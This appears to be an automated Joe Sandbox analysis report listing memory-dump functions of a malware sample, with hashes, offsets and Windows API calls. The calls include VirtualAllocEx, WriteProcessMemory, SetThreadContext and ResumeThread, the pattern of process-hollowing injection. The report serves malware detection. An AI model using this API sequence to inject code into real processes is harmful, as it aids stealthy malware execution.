                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 82284fc2745d5d58564dc6a9644a21861eb14c2fdbcc9b4d8c92c98a7264b6eb
                      • Instruction ID: c689c757589c7ccbd21b3e1783a02107eea9cb07a430c5dec76073231f21a271
                      • Opcode Fuzzy Hash: 82284fc2745d5d58564dc6a9644a21861eb14c2fdbcc9b4d8c92c98a7264b6eb
                      • Instruction Fuzzy Hash: A92142B6900349DFDB10CFA9C981BDEBBF1AF48314F10882AE959A7250C778A945DB94
                      Function 019ED660 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019ED6EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: ad7efe29fe4ed4d14ced56fc44a8d0624817534e0bbe0f41daf32827babaf4a8
                      • Instruction ID: 0d89efd2a3d67e3db631282e1c696ac0a124fa3c4a289bb01b55838cbee1c702
                      • Opcode Fuzzy Hash: ad7efe29fe4ed4d14ced56fc44a8d0624817534e0bbe0f41daf32827babaf4a8
                      • Instruction Fuzzy Hash: B121E3B5900258AFDB10CFA9D584AEEFBF5FB48314F14841AE919A3350D379A944CFA0
                      Function 07C3746B Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C374F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: ff910a6ebad8a81db83254fd0dbe3cb720a5dba6073c3faeb140bb01f7c4b831
                      • Instruction ID: e582c0c0829ba323084af2934bbdbe9efbfe548c81d8f0874935de29946946fd
                      • Opcode Fuzzy Hash: ff910a6ebad8a81db83254fd0dbe3cb720a5dba6073c3faeb140bb01f7c4b831
                      • Instruction Fuzzy Hash: 752125B18002599FCB10DFAAC984AEEFBF5FF48320F10842AE559A7250D7789944CFA4
                      Function 07C371E0 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C37266
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 216e5fdb932f5110fe7217b02b9126189acfb4867a473953efa25be05c3c615f
                      • Instruction ID: dd7b6016edae462a7eb11a865610130c90d62262ff9af5cf44cc9c744e4a795e
                      • Opcode Fuzzy Hash: 216e5fdb932f5110fe7217b02b9126189acfb4867a473953efa25be05c3c615f
                      • Instruction Fuzzy Hash: 022137B2D002098FDB10DFA9C585BEEBBF5EF48324F14842AD459A7241C7799585CFA4
                      Function 07C37470 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C374F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: f4d14a82bdc9d302b9a7e3a6ef2e35271685e740b059a12131b8c2ad22c4be33
                      • Instruction ID: 61c7303b0b74fa0b1739a0f207d5b17efc69f169a866449f1347d4e57c90ba38
                      • Opcode Fuzzy Hash: f4d14a82bdc9d302b9a7e3a6ef2e35271685e740b059a12131b8c2ad22c4be33
                      • Instruction Fuzzy Hash: 062128B18003599FCB10DFAAC884ADEFBF5FF48310F10842AE559A7250C7349544CBA4
                      Function 07C371E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C37266
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 735322d2952fc0d66e052d2b5c8e46d60ba51467c25dbc522a9f5c559aead6e6
                      • Instruction ID: 437229075d44fa3262c67ef578f3e249f50e4a28604a3e52f5368c44df0ab295
                      • Opcode Fuzzy Hash: 735322d2952fc0d66e052d2b5c8e46d60ba51467c25dbc522a9f5c559aead6e6
                      • Instruction Fuzzy Hash: 242138B1D003098FDB10DFAAC485BEEBBF4EF48324F10842AD459A7241C7789984CFA4
                      Function 019ED668 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019ED6EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 0f585ff96708b0cdccebbf05d3e201cdf901fd9dd9d454b7545358870688664e
                      • Instruction ID: 52230b87cc769b26725054654c742e4f8dd61adde9efc7b21cafcd728eb15d1f
                      • Opcode Fuzzy Hash: 0f585ff96708b0cdccebbf05d3e201cdf901fd9dd9d454b7545358870688664e
                      • Instruction Fuzzy Hash: 1D21E4B59002489FDB10CF9AD584ADEFFF8FB48310F14801AE918A3350D375A944CFA4
                      Function 019EAEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019EB459,00000800,00000000,00000000), ref: 019EB66A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 648d99acc7ffc1e0e61ede1b5f27fa3e098c989df40c192389d94ae7fbb7e55a
                      • Instruction ID: 97bb12b5693644d76a560a188f0ffded4644fdaeca96aea022486e8a1133d422
                      • Opcode Fuzzy Hash: 648d99acc7ffc1e0e61ede1b5f27fa3e098c989df40c192389d94ae7fbb7e55a
                      • Instruction Fuzzy Hash: 721123B69003099FDB20CF9AC448ADEFBF8EB48720F10842EE51AA7210C375A545CFA4
                      Function 019EB5F8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019EB459,00000800,00000000,00000000), ref: 019EB66A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 61da4317deb544071cd6aaf75d3519c9b1304b741bdf9a789c4b609b010090ed
                      • Instruction ID: 66ede06f370e182d5a0b973cd3b61f90da878cb6407e01a4c0f7b6e0be50105c
                      • Opcode Fuzzy Hash: 61da4317deb544071cd6aaf75d3519c9b1304b741bdf9a789c4b609b010090ed
                      • Instruction Fuzzy Hash: 6E1144B68003098FDB10CFAAC448ADEFBF8EB48720F10842AD55AA7310C375A545CFA4
                      Function 07C372C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C3732E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a0765d9bd1b73e991ba0a1455749d3e0deff587d22b021f8e77bf6df1b883748
                      • Instruction ID: 8ddae34ba9785ecdfb2eeae9382904ab21f73bc7891dc28b7bf03ee19b546b96
                      • Opcode Fuzzy Hash: a0765d9bd1b73e991ba0a1455749d3e0deff587d22b021f8e77bf6df1b883748
                      • Instruction Fuzzy Hash: 201126B19002499FCB10DFAAC844ADEBBF5EB88324F108419E559A7250C775A554CFA4
                      Function 07C372B8 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C3732E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: d353b1fb217beecdd8815e59896ea2f0b8968a2abd6919b6ce836474da1f9013
                      • Instruction ID: eee001a7afb97f6ac724665e9d5426959c1db8ff5935b7660f3ae18a4a43a7f4
                      • Opcode Fuzzy Hash: d353b1fb217beecdd8815e59896ea2f0b8968a2abd6919b6ce836474da1f9013
                      • Instruction Fuzzy Hash: B01156B69043498FCB10CFA9C840BDEBFF1AF48314F24886EE555A7250C7799554CF95
                      Function 07C37130 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 89f55a19df15012ca10d6adde6a7114c4daeac67839b91d08d28f87d20d51624
                      • Instruction ID: 443f73e79b6c651bd9f8205a9ffd7d8e6be1b854595a19d4fdca0a2167307631
                      • Opcode Fuzzy Hash: 89f55a19df15012ca10d6adde6a7114c4daeac67839b91d08d28f87d20d51624
                      • Instruction Fuzzy Hash: 2D116AB2D003098FCB10DFA9C4857DEFBF5AF48324F20882AD459A7250C735A544CF94
                      Function 07C37138 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: eb1cfd5f29c71e9572cb28facde654c69484bd841f135095cd14be5e1fe9e02e
                      • Instruction ID: 6653ae011d403cd5d68482f6f155c56be689f5f1cdde7b9b2290ad361bf62794
                      • Opcode Fuzzy Hash: eb1cfd5f29c71e9572cb28facde654c69484bd841f135095cd14be5e1fe9e02e
                      • Instruction Fuzzy Hash: 74113AB19003498FCB10DFAAC4457DEFBF5EB89324F208419D459A7250C775A544CFA4
                      Function 019EB378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 019EB3DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 7365f849864b3d69ea85cc7b1e94a1115c8cf3300fe91f164d148b3ca125ef3c
                      • Instruction ID: ea04b5ebc2f33426039d28004319bfad1104a36e03dfc48bf503746fb3bc2b4a
                      • Opcode Fuzzy Hash: 7365f849864b3d69ea85cc7b1e94a1115c8cf3300fe91f164d148b3ca125ef3c
                      • Instruction Fuzzy Hash: 2511F2B5C007498FDB10CF9AD449ADEFBF8EF88324F10842AD96AA7210C375A545CFA5
                      Function 07C38470 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C3B9F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 41242d5db57056d11b163eda5bd70c23feebcded2256b1a6d98404f525ab57d7
                      • Instruction ID: 6999fc0012393b663423ad2bdbaa059d1d0fd7db81c0392b70adbff33c8f113d
                      • Opcode Fuzzy Hash: 41242d5db57056d11b163eda5bd70c23feebcded2256b1a6d98404f525ab57d7
                      • Instruction Fuzzy Hash: 761103B5800349DFCB20DF9AC884BDEFBF8EB48324F10845AE559A7200C375A984CFA1
                      Function 07C3B991 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C3B9F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: f66b3065b201bb44d2af7c7f68feed9960b6e221cda9ca3bbce7531939a478b8
                      • Instruction ID: 100dbc9092d0d9c91b36a59cc1409826cf510bca25cbd2079ce54cd27b57cddb
                      • Opcode Fuzzy Hash: f66b3065b201bb44d2af7c7f68feed9960b6e221cda9ca3bbce7531939a478b8
                      • Instruction Fuzzy Hash: 1B1103B5800749DFDB10CF99D984BDEFBF4EB48324F20851AE559A7250C379A984CFA0
                      Function 017ED4C4 Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734321076.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_17ed000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d483b3fa603dbaf5708b6fb6fd99dd14475e4a7ccf6785e7ede82514dbc7136
                      • Instruction ID: aedc9a17ba418aa77594177280e9b573a15da0cf4ba760782d09c5cd6d0c0ddb
                      • Opcode Fuzzy Hash: 6d483b3fa603dbaf5708b6fb6fd99dd14475e4a7ccf6785e7ede82514dbc7136
                      • Instruction Fuzzy Hash: E9212571500240DFDB25DF58D9C8B2AFFE5FB88318F30C5A9E9090B256C336D456CAA1
                      Function 017FD01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734366355.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_17fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 070495c94f2216181fab0a64e83170832dd2156c07169d10763e196270f1792c
                      • Instruction ID: 8772a58081507cc769176612ebb76f959d903a0a34f9735c5624f424fc3f3de6
                      • Opcode Fuzzy Hash: 070495c94f2216181fab0a64e83170832dd2156c07169d10763e196270f1792c
                      • Instruction Fuzzy Hash: 0921D071604204DFDB25DF58D984B27FBA5EB88354F20C5ADEA0A4B356C33AD446CA62
                      Function 017ED4BF Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734321076.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_17ed000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction ID: 93b8ad9cbbe6c084a01f78bd5f9ea088c73a63ec06038d1020ba4e7b43f76326
                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                      • Instruction Fuzzy Hash: C811AF76504280CFDB16CF54D9C4B16FFB2FB88318F24C6AAD9490B656C336D45ACBA1
                      Function 017FD017 Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734366355.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_17fd000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction ID: 061a631cc2e9f67696d5bd13750d38576f73e2b114031e831ac02e21b2ccf302
                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction Fuzzy Hash: 6A11A975504280CFDB26CF58D5C4B16FBA2FB88214F24C6AED9094B756C33AD40ACBA2

                      Non-executed Functions

                      Function 07C3CA30 Relevance: .3, Instructions: 341COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f539de785bebdfbabdc988a1299bb8b5c1ea3e7f611bf98e51fdffc7eb577e7
                      • Instruction ID: 6bda9924ae1081959f4d35dab232c2538c5d3153a71092224dc63d120f406997
                      • Opcode Fuzzy Hash: 1f539de785bebdfbabdc988a1299bb8b5c1ea3e7f611bf98e51fdffc7eb577e7
                      • Instruction Fuzzy Hash: 1EC1BDB17017058FDB26DB75C4947AEB7F6AF89600F14446DD04AAB2E0DB35E902CBA1
                      Function 05890040 Relevance: .3, Instructions: 315COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e17924fc13cb69f1cbc979e94954a47637e80bae57b0fad5c3fbe4a15cf1d0b4
                      • Instruction ID: 6a75167b52bcbd14d73147c59e8e1ec8eafecb4190efea6662d1a24a308f81a6
                      • Opcode Fuzzy Hash: e17924fc13cb69f1cbc979e94954a47637e80bae57b0fad5c3fbe4a15cf1d0b4
                      • Instruction Fuzzy Hash: FE1282BCC017468BE730CF65E94C1993BB1BBC1318B904319D2A12B6E9DBBA154BCF48
                      Function 07C34E30 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 74813ec44400e3b97504e3f79f99e9cc5f0a64bb8dfa29c7d17f8aa9c6f21917
                      • Instruction ID: 9a64dc438c93fde19ec08e9a748751406ef230256cae5b7eba47373dd1322b15
                      • Opcode Fuzzy Hash: 74813ec44400e3b97504e3f79f99e9cc5f0a64bb8dfa29c7d17f8aa9c6f21917
                      • Instruction Fuzzy Hash: EEE149B4E002198FDB14DFA9D5809AEFBB2FF89300F248169E415AB356D735AD41CFA1
                      Function 07C345C0 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1698e5d4d579bcf7f1cd52af9cb52450f22965458c37a61b959efd4187aefd20
                      • Instruction ID: 4b274d6eeaec12318a3b11b0afb987eaf12f511fef2fb493bab913d5c3eeb77d
                      • Opcode Fuzzy Hash: 1698e5d4d579bcf7f1cd52af9cb52450f22965458c37a61b959efd4187aefd20
                      • Instruction Fuzzy Hash: 84E12AB4E002598FDB14DFA9C5809AEFBB2FF49304F248169E415AB356D734AE81CF61
                      Function 07C364D8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d81a72101b09239a7c82627479fc97be3b48cd048b081ea3eff162042e32f1bb
                      • Instruction ID: 622c022ca519a132e29438476a6f7ba89006916e2113b29ac1521fbcc0f62c9d
                      • Opcode Fuzzy Hash: d81a72101b09239a7c82627479fc97be3b48cd048b081ea3eff162042e32f1bb
                      • Instruction Fuzzy Hash: 3FE11AB4E002199FDB14DFA9C5809AEFBB2FF89304F248169E415AB356D734AD41CFA1
                      Function 07C349F8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 43d5abe546d505e725d00351d15215fadc64efee0fc3c2965e3d7a7d1155f542
                      • Instruction ID: 479cea12c2d8f72f5909236606808ee3ccbd8e550dcfec75e5c414d4a8c70b36
                      • Opcode Fuzzy Hash: 43d5abe546d505e725d00351d15215fadc64efee0fc3c2965e3d7a7d1155f542
                      • Instruction Fuzzy Hash: 59E11BB4E001598FDB14DFA9C5809AEFBB2FF89304F248169E415AB356D734AE41CFA1
                      Function 07C36910 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 51b56a9b82a84da1e93b8b4a87c837a75c469196a2eb26af81b485312f323bce
                      • Instruction ID: 3379a6407ecc5302d8063acf63149fedaaab8a38113bd1822aa6cb3a9d555e62
                      • Opcode Fuzzy Hash: 51b56a9b82a84da1e93b8b4a87c837a75c469196a2eb26af81b485312f323bce
                      • Instruction Fuzzy Hash: 14E108B4E002199FDB14DFA9C5809AEFBB2FF89304F248169E415AB356D734AD81CF61
                      Function 019EDF8C Relevance: .3, Instructions: 264COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a96c947d81beaed72cf253616d7806bc03b5febf7da9e00fa46251b8e3f0492
                      • Instruction ID: 9cbebd9648fcd9579bf5cba7493b0679b3f404273fe4badaab44fc93eee4fa67
                      • Opcode Fuzzy Hash: 8a96c947d81beaed72cf253616d7806bc03b5febf7da9e00fa46251b8e3f0492
                      • Instruction Fuzzy Hash: 00A16E36A00209CFCF16DFB8C4485AEBBF6FFC5301B15456AE909AB265DB32D956CB40
                      Function 05890007 Relevance: .2, Instructions: 240COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c4c95d706ab02ee2130bdb96526a5faa5e6975a488ffa8ab96bd1727dcd4b6e5
                      • Instruction ID: ff55a9ea5428b9aee17fdc6752ef3ab504df14a45470fdf61a164ccf0fabc8b5
                      • Opcode Fuzzy Hash: c4c95d706ab02ee2130bdb96526a5faa5e6975a488ffa8ab96bd1727dcd4b6e5
                      • Instruction Fuzzy Hash: 7BD126BCC007468FD720CF65E8482997BB1BFC5328B544319D1A16B2E9DBBA148BCF48
                      Function 07C345AB Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: de060f2b59320fe970f0715f4eb20b9cd23fc01ff15250bf99a7b048bab5c0ff
                      • Instruction ID: 7fd0bc40340d33540c4f80b52398c23eceedb708b38697d2419b1fb3eb1e89ff
                      • Opcode Fuzzy Hash: de060f2b59320fe970f0715f4eb20b9cd23fc01ff15250bf99a7b048bab5c0ff
                      • Instruction Fuzzy Hash: FF512AB4E002598FDB14DFA9C5805AEFBF2FF89301F24816AD419AB256D734AE41CF61
                      Function 07C36901 Relevance: .1, Instructions: 134COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04405718d28efde7bdd988e2c9adfdbc11c55dfb4c02a84d5208c30ca99ee3cf
                      • Instruction ID: 8ba44077cdf9625a69fd879462ebdda39d225d2e6945812ad188a108169098c0
                      • Opcode Fuzzy Hash: 04405718d28efde7bdd988e2c9adfdbc11c55dfb4c02a84d5208c30ca99ee3cf
                      • Instruction Fuzzy Hash: 56512DB0E002199FDB14CFA9D5805AEFBF2FF89310F24C169D419A7256D734A941CF61
                      Function 07C349E9 Relevance: .1, Instructions: 132COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 302c469aba3d4f7ec971e0af86a4283708a847a9370295892c2f5367c8ba9563
                      • Instruction ID: 3a02a6c74d47b87ac4e505ba9a61360029ca0345f825af94ede5557ae3d89126
